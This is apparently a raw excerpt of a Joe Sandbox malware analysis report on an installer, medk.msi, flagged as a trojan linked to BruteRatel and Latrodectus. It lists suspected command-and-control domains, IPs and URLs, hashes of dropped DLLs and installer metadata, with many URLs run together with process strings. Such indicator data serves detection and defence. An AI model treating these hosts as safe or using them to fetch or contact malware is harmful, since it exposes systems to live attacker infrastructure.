            C:\Windows\Installer\MSI8DD8.tmp | 0% | ReversingLabs
            C:\Windows\Installer\MSI8E17.tmp | 0% | ReversingLabs
            C:\Windows\Installer\MSI8F42.tmp | 0% | ReversingLabs
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            samomol.com | 87.120.37.120 | true | true | | unknown
            ergiholim.com | 104.21.15.162 | true | true | | unknown
            rolefenik.com | 104.21.92.105 | true | false | | high
            burjog.com | 45.143.166.230 | true | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            https://rolefenik.com/test/ | true | Avira URL Cloud: malware | unknown
            https://ergiholim.com/test/ | true | Avira URL Cloud: malware | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ergiholim.com/explorer.exe, 00000008.00000002.4590045694.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C35C000.00000004.00000001.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://excel.office.com-explorer.exe, 00000008.00000000.2242782012.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3083287941.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980843458.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000C086000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                https://burjog.com:9043/matrix.phprundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232775913.0000029311A5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://burjog.com:9043/pankihoy.phprundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://rolefenik.com/cexplorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://burjog.com:9043/matrix.phpwOvarundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://r11.i.lencr.org/0rundll32.exe, 00000006.00000003.2232775913.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335149370.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335035176.0000029311AC3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276432733.0000029311ABE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4569718360.0000029313A30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 
00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.00000293119F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://samomol.com:9043/pankihoy.phprundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://powerpoint.office.comEMdexplorer.exe, 00000008.00000000.2242782012.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.thawte.com/cps0/medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drfalse
                                                                                high
                                                                                https://rolefenik.com/test/Kexplorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://android.notify.windows.com/iOSexplorer.exe, 00000008.00000002.4590045694.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2242782012.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://burjog.com:9043/derrundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://burjog.com:9043/pankihoy.phpCryptographyQJgarundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://www.thawte.com/repository0Wmedk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drfalse
                                                                                    high
                                                                                    https://outlook.comeexplorer.exe, 00000008.00000000.2242782012.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3083287941.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980843458.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000C086000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000008.00000000.2238643975.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3075025138.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4581549359.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980638609.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://burjog.com:9043/neo.phpAHJrundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://rolefenik.com/test/3explorer.exe, 00000008.00000002.4590045694.000000000C354000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://www.advancedinstaller.commedk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drfalse
                                                                                              high
                                                                                              https://burjog.com/rundll32.exe, 00000006.00000003.2232775913.0000029311A5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://api.msn.com/explorer.exe, 00000008.00000002.4581549359.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://burjog.com:9043/neo.phpjJrundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://rolefenik.com/test/;explorer.exe, 00000008.00000002.4581549359.00000000098AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                unknown
                                                                                                https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.msn.com:443/en-us/feedexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://burjog.com:9043/rundll32.exe, 00000006.00000003.2232775913.0000029311A5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-eiexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://rolefenik.com/est/explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          https://rolefenik.com/Kexplorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
IP              Domain         Country             ASN    ASN Name         Malicious
87.120.37.120   samomol.com    Bulgaria            34224  NETERRA-ASBG     true
104.21.15.162   ergiholim.com  United States       13335  CLOUDFLARENETUS  true
104.21.92.105   rolefenik.com  United States       13335  CLOUDFLARENETUS  false
45.143.166.230  burjog.com     Russian Federation  43182  ITTITT-ASRU      true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1555319
Start date and time: 2024-11-13 18:19:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: medk.msi
Detection: MAL
Classification: mal100.troj.evad.winMSI@9/24@4/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 27
• Number of non-executed functions: 192
Cookbook Comments:
• Found application associated with file extension: .msi
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • VT rate limit hit for: medk.msi
Time | Type | Description
12:20:19 | API Interceptor | 11154522x Sleep call for process: explorer.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.21.15.162 | yPSjWvD9LD.dll | Get hash | malicious | BruteRatel, Latrodectus | Browse |
104.21.15.162 | http://playtaku.online | Get hash | malicious | Unknown | Browse |
104.21.92.105 | apptext.dll.dll | Get hash | malicious | BruteRatel, Latrodectus | Browse |
104.21.92.105 | Document-v05-53-20.js | Get hash | malicious | BruteRatel, Latrodectus | Browse |
104.21.92.105 | yPSjWvD9LD.dll | Get hash | malicious | BruteRatel, Latrodectus | Browse |
45.143.166.230 | Document-19-06-38.js | Get hash | malicious | BruteRatel | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
ergiholim.com | yPSjWvD9LD.dll | Get hash | malicious | BruteRatel, Latrodectus | Browse | 104.21.15.162
ergiholim.com | 0TokOhBLe6.dll | Get hash | malicious | BruteRatel, Latrodectus | Browse | 172.67.163.30
rolefenik.com | lavi.msi | Get hash | malicious | BruteRatel, Latrodectus | Browse | 172.67.191.232
rolefenik.com | apptext.dll.dll | Get hash | malicious | BruteRatel, Latrodectus | Browse | 104.21.92.105
rolefenik.com | Document-v05-53-20.js | Get hash | malicious | BruteRatel, Latrodectus | Browse | 104.21.92.105
rolefenik.com | yPSjWvD9LD.dll | Get hash | malicious | BruteRatel, Latrodectus | Browse | 104.21.92.105
rolefenik.com | 0TokOhBLe6.dll | Get hash | malicious | BruteRatel, Latrodectus | Browse | 172.67.191.232
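Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Windows\Installer\MSI8D3A.tmp | lavi.msi | Get hash | malicious | BruteRatel, Latrodectus | Browse |
C:\Windows\Installer\MSI8D3A.tmp | Document-v09-42-38.js | Get hash | malicious | BruteRatel | Browse |
C:\Windows\Installer\MSI8D3A.tmp | Document-v05-53-20.js | Get hash | malicious | BruteRatel, Latrodectus | Browse |
C:\Windows\Installer\MSI8D3A.tmp | FW3x3p4eZ5.msi | Get hash | malicious | Bazar Loader, BruteRatel | Browse |
C:\Windows\Installer\MSI8D3A.tmp | Document-19-06-38.js | Get hash | malicious | BruteRatel | Browse |
C:\Windows\Installer\MSI8D3A.tmp | Document-19-06-38.js | Get hash | malicious | BruteRatel | Browse |
C:\Windows\Installer\MSI8D3A.tmp | Document-14-33-26.js | Get hash | malicious | Unknown | Browse |
C:\Windows\Installer\MSI8D3A.tmp | net.msi | Get hash | malicious | Unknown | Browse |
C:\Windows\Installer\MSI8D3A.tmp | Document-14-33-26.js | Get hash | malicious | Unknown | Browse |
C:\Windows\Installer\MSI8D3A.tmp | 1156#U91d1#U5c71#U6bd2#U9738#U79bb#U7ebf#U5b89#U88c5#U5305.msi | Get hash | malicious | Unknown | Browse |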
Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: modified
Size (bytes): 1191
Entropy (8bit): 5.695308844822562
Encrypted: false
SSDEEP: 24:ZZlOgozVZ6I/XktlRpUjjFPLQOEDhiSOyRLK:ZanuI/SbmPGD8SOR
MD5: C71429BA343457D00A705AB2792D1F93
SHA1: DFD185E3328B9D382E2A24BE8D51B59B64D1A952
SHA-256: 227CF8DB2181B88B233CDE823E863D7EFE7437C242FD6895E0B5583F7CAD9567
SHA-512: 607A3B1E29F924D1FA4792CB83CD38300FEE8B0CDA3196B468753B8737D78DBB34E5F670EA9C71A337AC0D9FC023B1A4E59A192DAC987311F64C7C0438CCC9BD
Malicious: false
Reputation: low
                                                                                                                                          Preview:...@IXOS.@.....@.bmY.@.....@.....@.....@.....@.....@......&.{5AB6B0C5-5CD6-4CF7-ABF4-4E467A0D78CE}..MiddleTown..medk.msi.@.....@C....@.....@........&.{B4021E8B-3405-4502-A951-957A46D23C96}.....@.....@.....@.....@.......@.....@.....@.......@......MiddleTown......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{5AB6B0C5-5CD6-4CF7-ABF4-4E467A0D78CE}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{5AB6B0C5-5CD6-4CF7-ABF4-4E467A0D78CE}.@......&.{C38A4B2A-9F83-4A9D-8505-10020DD6ABA7}&.{5AB6B0C5-5CD6-4CF7-ABF4-4E467A0D78CE}.@........CreateFolders..Creating folders..Folder: [1]#.6.C:\Users\user\AppData\Roaming\MSER LTD\MiddleTown\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..".C:\Users\user\AppData\Roaming\....).C:\Users\user\AppData\Roaming\tab.dll....WriteRegistryValues..Writing system registry values..Key: [1]
Process: C:\Windows\System32\msiexec.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1692160
Entropy (8bit): 6.810501247617741
Encrypted: false
SSDEEP: 24576:87u7nB/DBD9accSqVO9y/QaD74F3Zux5UDJpbD52hCvrHbvLz:8y/DBD9MVO9yos0F345UTbDukHvL
MD5: 4F4A164B5F9EF20BE601531A727179A2
SHA1: 1601622DC7CAEF28CE413E1D73B4D4596AABFC50
SHA-256: 0F23855E56EB6EC760717BE43280EEEEAEC1AEEF939F9AE6A41DAF1B8E3BD306
SHA-512: DE09D9F0048A19C7EFA7FFAE01F58C41E619E09E6EC56E4B818B58846672A0772C58913BA5AD4C86B746D91399894A21BF51225C1737A0652B1C85FFA3307030
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Reputation: low
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {B4021E8B-3405-4502-A951-957A46D23C96}, Number of Words: 10, Subject: MiddleTown, Author: MSER LTD, Name of Creating Application: MiddleTown, Template: ;1033, Comments: This installer database contains the logic and data required to install MiddleTown., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2131456
                                                                                                                                          Entropy (8bit):7.438035416775101
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:F943YhW8zBQSc0ZnSKBZKumZr7Apj3Y+7jHplNa:6YY0Zn3K/Al3dXHpra
                                                                                                                                          MD5:8CB04BF931A19FA0AE1BD7235180DD4A
                                                                                                                                          SHA1:DFC980A827DBDE294AE9FA6E63545D1D57344E96
                                                                                                                                          SHA-256:DFFF1A07429FF9585F3DAB9C78B501174E7C326E1FB95C5234368071B5426768
                                                                                                                                          SHA-512:58F1661D689AAA9391F04E086DB490693F83B70E068CA10B20CFF6F87979A8804AA9F054AC961AF06C4B7B17FD88B1912774B2EB3D16B9DF8E7A4ED9BB3C0A29
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):446944
                                                                                                                                          Entropy (8bit):6.403916470886214
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: lavi.msi, Detection: malicious
                                                                                                                                          • Filename: Document-v09-42-38.js, Detection: malicious
                                                                                                                                          • Filename: Document-v05-53-20.js, Detection: malicious
                                                                                                                                          • Filename: FW3x3p4eZ5.msi, Detection: malicious
                                                                                                                                          • Filename: Document-19-06-38.js, Detection: malicious
                                                                                                                                          • Filename: Document-19-06-38.js, Detection: malicious
                                                                                                                                          • Filename: Document-14-33-26.js, Detection: malicious
                                                                                                                                          • Filename: net.msi, Detection: malicious
                                                                                                                                          • Filename: Document-14-33-26.js, Detection: malicious
                                                                                                                                          • Filename: 1156#U91d1#U5c71#U6bd2#U9738#U79bb#U7ebf#U5b89#U88c5#U5305.msi, Detection: malicious
                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):400974
                                                                                                                                          Entropy (8bit):6.591604107980969
                                                                                                                                          Encrypted:false
